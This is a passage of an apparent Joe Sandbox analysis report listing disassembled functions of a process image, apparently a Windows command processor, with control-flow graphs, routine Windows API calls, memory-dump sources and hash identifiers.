                                                                                                          control_flow_graph 1171 7ff7ab138d80-7ff7ab138da2 1172 7ff7ab138da4-7ff7ab138daf 1171->1172 1173 7ff7ab138dcc 1172->1173 1174 7ff7ab138db1-7ff7ab138db4 1172->1174 1177 7ff7ab138dd1-7ff7ab138dd9 1173->1177 1175 7ff7ab138dbf-7ff7ab138dca Sleep 1174->1175 1176 7ff7ab138db6-7ff7ab138dbd 1174->1176 1175->1172 1176->1177 1178 7ff7ab138de7-7ff7ab138def 1177->1178 1179 7ff7ab138ddb-7ff7ab138de5 _amsg_exit 1177->1179 1181 7ff7ab138df1-7ff7ab138e0a 1178->1181 1182 7ff7ab138e46 1178->1182 1180 7ff7ab138e4c-7ff7ab138e54 1179->1180 1184 7ff7ab138e56-7ff7ab138e69 _initterm 1180->1184 1185 7ff7ab138e73-7ff7ab138e75 1180->1185 1183 7ff7ab138e0e-7ff7ab138e11 1181->1183 1182->1180 1186 7ff7ab138e38-7ff7ab138e3a 1183->1186 1187 7ff7ab138e13-7ff7ab138e15 1183->1187 1184->1185 1188 7ff7ab138e77-7ff7ab138e79 1185->1188 1189 7ff7ab138e80-7ff7ab138e88 1185->1189 1186->1180 1191 7ff7ab138e3c-7ff7ab138e41 1186->1191 1190 7ff7ab138e17-7ff7ab138e1b 1187->1190 1187->1191 1188->1189 1192 7ff7ab138e8a-7ff7ab138e98 call 7ff7ab1394f0 1189->1192 1193 7ff7ab138eb4-7ff7ab138ec8 call 7ff7ab1337d8 1189->1193 1195 7ff7ab138e2d-7ff7ab138e36 1190->1195 1196 7ff7ab138e1d-7ff7ab138e29 1190->1196 1198 7ff7ab138f28-7ff7ab138f3d 1191->1198 1192->1193 1201 7ff7ab138e9a-7ff7ab138eaa 1192->1201 1200 7ff7ab138ecd-7ff7ab138eda 1193->1200 1195->1183 1196->1195 1203 7ff7ab138edc-7ff7ab138ede exit 1200->1203 1204 7ff7ab138ee4-7ff7ab138eeb 1200->1204 1201->1193 1203->1204 1205 7ff7ab138ef9 1204->1205 1206 7ff7ab138eed-7ff7ab138ef3 _cexit 1204->1206 1205->1198 1206->1205
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291973834-0
                                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                          • Instruction ID: 555eb4d8b87a6275351531491a8030b73a457dcaf32e91daaf72d3d56b4d1a99
                                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                          • Instruction Fuzzy Hash: 10410A25A0A60382F797BB1CF980675A6A0FF5434CFD60935D91D876B0EF7CE8988760
                                                                                                          Function 00007FF7AB134A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1207 7ff7ab134a14-7ff7ab134a3e GetEnvironmentStringsW 1208 7ff7ab134aae-7ff7ab134ac5 1207->1208 1209 7ff7ab134a40-7ff7ab134a46 1207->1209 1210 7ff7ab134a59-7ff7ab134a8f GetProcessHeap HeapAlloc 1209->1210 1211 7ff7ab134a48-7ff7ab134a52 1209->1211 1213 7ff7ab134a91-7ff7ab134a9a memmove 1210->1213 1214 7ff7ab134a9f-7ff7ab134aa9 FreeEnvironmentStringsW 1210->1214 1211->1211 1212 7ff7ab134a54-7ff7ab134a57 1211->1212 1212->1210 1212->1211 1213->1214 1214->1208
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1623332820-0
                                                                                                          • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                          • Instruction ID: a9e80c28694a10f746b747df537636d32ba4124b05e65f17cfc8b87a08f56500
                                                                                                          • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                          • Instruction Fuzzy Hash: 80119425B1674182DE56AB0AF404039FBA0FB89F84B9A9134DE4F03774EF3DE4458750
                                                                                                          Function 00007FF7AB135CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1826527819-0
                                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                          • Instruction ID: 019e4a36202a8892074c6ec3ecea2e5bb6af1097df60689b23b877a28beb2d09
                                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                          • Instruction Fuzzy Hash: E9015B7190A682CAE6067B1DF4841B9FA60FB8A759FC66230D54F033B5EF3C90488720
                                                                                                          Function 00007FF7AB133060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7AB1292AC), ref: 00007FF7AB1330CA
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB1330DD
                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB1330F6
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB133106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1464828906-0
                                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                          • Instruction ID: 2d89adc9bfdb4b0abdb3cf7c1660ad7a02dc9fa31274631fe27a3d7e2a5deeef
                                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                          • Instruction Fuzzy Hash: 66312B22A0970582E6AAAF0DF04047DF660FB45B98FC69134DA4A433F0EF7DA8494320
                                                                                                          Function 00007FF7AB12CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                          • Instruction ID: bf5751da2718d7e857140ec16c1f09f89e8cdd1b72c775048c7e9d6835c9b827
                                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                          • Instruction Fuzzy Hash: 2311CA61A0A74281EB55EB1DF1442B9A2509F84BACF954331DE6D473F5FE2CD4454320
                                                                                                          Function 00007FF7AB12BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcschr
                                                                                                          • String ID: 2$COMSPEC
                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction ID: 871d66ac56159339634f83c76faac090e6017405a0ab398c94d5d4044214133e
                                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction Fuzzy Hash: 9751A122A0A643C5FB67BB2DF49137AE2919F44B8CF864031DA4D426F5DE2DE8448761
                                                                                                          Function 00007FF7AB132EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4254246844-0
                                                                                                          • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                          • Instruction ID: 291bbef25b171a2b2314424986f407d6e6549684f87f32eee2636b889729811f
                                                                                                          • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                          • Instruction Fuzzy Hash: 3E419621A0A74286EE96AB08F444379F790FF49788F865531D95D477B0FF3CE4498760
                                                                                                          Function 00007FF7AB13498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 2643372051-0
                                                                                                          • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                          • Instruction ID: 4827f86234511fc2ae3dcf518748ee94089edba559c412607aa1aeb9a318575d
                                                                                                          • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                          • Instruction Fuzzy Hash: D5F0D672B1AB4281EB05AB2DF454074EAE1FF5D7A4B879334C52E033B4DE3C94448220
                                                                                                          Function 00007FF7AB135A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 1591002910-0
                                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                          • Instruction ID: 605d5d8ec0567993b985d8a43f9688b2f13509dd5c5ea4feab659799e5701994
                                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                          • Instruction Fuzzy Hash: DAF06734A4B602CBE706AB18F895179BBA0FB8D719B865235C90A43334DE3DA4158B11
                                                                                                          Function 00007FF7AB13291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DriveType
                                                                                                          • String ID: :
                                                                                                          • API String ID: 338552980-336475711
                                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                          • Instruction ID: 28bf559c3646b83636a164d3a6a04605856f8dc573197f1e0a7878da6b68c91a
                                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                          • Instruction Fuzzy Hash: 81E0E56661860087D7209B58F09106AF760FB8C308FC51624D98D83734DB3CC249CB18
                                                                                                          Function 00007FF7AB135AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF7AB135B52
                                                                                                            • Part of subcall function 00007FF7AB134224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134297
                                                                                                            • Part of subcall function 00007FF7AB134224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1342D7
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB1342FD
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB134368
                                                                                                            • Part of subcall function 00007FF7AB134224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134380
                                                                                                            • Part of subcall function 00007FF7AB134224: wcsrchr.MSVCRT ref: 00007FF7AB1343E6
                                                                                                            • Part of subcall function 00007FF7AB134224: lstrcmpW.KERNELBASE ref: 00007FF7AB134401
                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7AB135BC7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 497088868-0
                                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                          • Instruction ID: 93e1d054896898dcc63ab178fdf82fb0f1fe47c4e10f67c43ae1a2d17e8469d0
                                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                          • Instruction Fuzzy Hash: B631B630A0E64286FA69B719F49417DE295FF89B8CF865031D94E47BB5EF3CE4058710
                                                                                                          Function 00007FF7AB139A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1412018758-0
                                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                          • Instruction ID: 07e695a87ec2638c0a7469e996b99b8eb7c6cb83922186750ba6f307d45bdb64
                                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                          • Instruction Fuzzy Hash: 6FE06541F1B24B81FE5E376AF881178A2505F18789FC91430CD0E053B2FD2CA1998330
                                                                                                          Function 00007FF7AB12CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
